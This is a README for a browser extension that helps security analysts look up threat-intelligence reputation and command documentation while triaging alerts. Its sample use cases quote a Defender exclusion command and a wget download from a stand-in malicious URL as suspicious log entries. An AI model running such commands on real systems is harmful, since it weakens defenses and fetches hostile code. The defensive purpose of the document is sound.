SOCMaster

Description

Swiftly transform data into useful intelligence by enabling SOC/cybersecurity analysts, system administrators, or incident responders to search and display an artifact's reputation, context, and documentation from the browser tab of the SIEM, EDR, or any other webpage.

This tool may reduce triage and investigation times as well as from having to manually search for IP addresses, Domains, File Hashes, Operating System commands, File Names, Event IDs or any string of characters that require multiple browser tabs to keep track of.

==============================
USAGE
==============================

1. From the web browser, select or highlight an artifact and right-click
2. Select "SOCMaster"
3. Click one of the options available
4. Menu will appear on lower right side containing information on the artifacts

===============================
MAIN FEATURES
===============================

1. IP/Domain/Hash using vendor API keys:

- Uses Threat intelligence vendors such as AbuseIPDB, VirusTotal, AlienVaultOTX to obtain the reputation and information on an IP address, Domain, Hash. Data available is dependent on the vendor

2. Get OS command information and arguments (PowerShell, Windows, Linux OSX):

- Get information on over 3, 300 Powershell cmdlets including modules, almost all Linux commands (Man Sections 1-8), all documented Windows commands, and OSX commands

- Shows information about Operating System binaries and commands. This includes windows commands such as ipconfig /renew "Local Area Connection" or Powershell cmdlets (i.e. Set-ExecutionPolicy)

- Adding an argument to the OS command will limit the data shown, showing only the command description and information on the argument or command switches such as "/renew" for Windows command ipconfig, "-r" for linux command rm, "-AuthType" for Powershell cmdlet Disable-ADAccount

- To get full information on the OS command, omit any arguments/switches.

3. Get file information using file name (Windows/Linux):

- Retrieve information on known files such as "kernel32.dll" or "passwd" for Linux

4. Get event ID Information (Windows):

- Show documentation on a Windows Event Log using its Event ID

5. String search (Twitter, Google):

- Display results from Twitter or Google search results using any string of characters

==============================
API KEY CONFIGURATION
==============================

To query IP, Domain, and Hash using vendor API keys, the API key is required. Follow the steps:

1. Click Extensions icon in Google Chrome's upper right menu
2. Click the "SOCMaster" icon > Settings
3. On the settings page, on the upper right corner click "Add API key"
4. On intel source selection, select API key vendor
5. Paste Vendor API key on the API key field
6. Click save
7. API key now added, IP/Domain/Hash scan using vendor API keys can now be used

For Twitter API, bearer token is entered as the API key like the above API key configuration steps. Bearer token can be obtained by signing up for a Twitter developer account. More info here: https://developer.twitter.com/en/docs/authentication/oauth-1-0a/api-key-and-secret.

For VirusTotal, AlienVault, AbuseIPDB, an account is required to obtain an API key.

==============================
SAMPLE USE CASE
==============================

1. Suspicious PowerShell logs show:
Set-MpPreference -ExclusionPath "C:\users\public\documents\sucmra"

A user can highlight the above command and select the "Find command information" option and will be able to view the syntax and parameters of the command.

2. Suspicious IP address from the firewall logs:
x.x.x.x

A user can highlight the IP and select the "IP scan using vendor API keys" option and will be able to view IP reputation and data from vendors.

3. Suspicious linux command show:
wget http://malicious_url -O

A user can highlight the above command and select the "Find command information" option and will be able to view the syntax and parameters of the command.

4. Windows Event IDs on the SIEM show:
eventID 4624

A user can highlight the event ID number and select the "Get event ID information" option and will be able to view the fields and description of the Windows event

==============================
CREDITS
==============================

This chrome extension uses following websites as reference data:

https://lolbas-project.github.io/
https://gtfobins.github.io/
https://ss64.com/
https://man7.org/
https://linux.die.net/
https://learn.microsoft.com/en-us/powershell/module/
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands
https://www.file.net
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/
https://www.google.com

Michael Hingpit for help with UI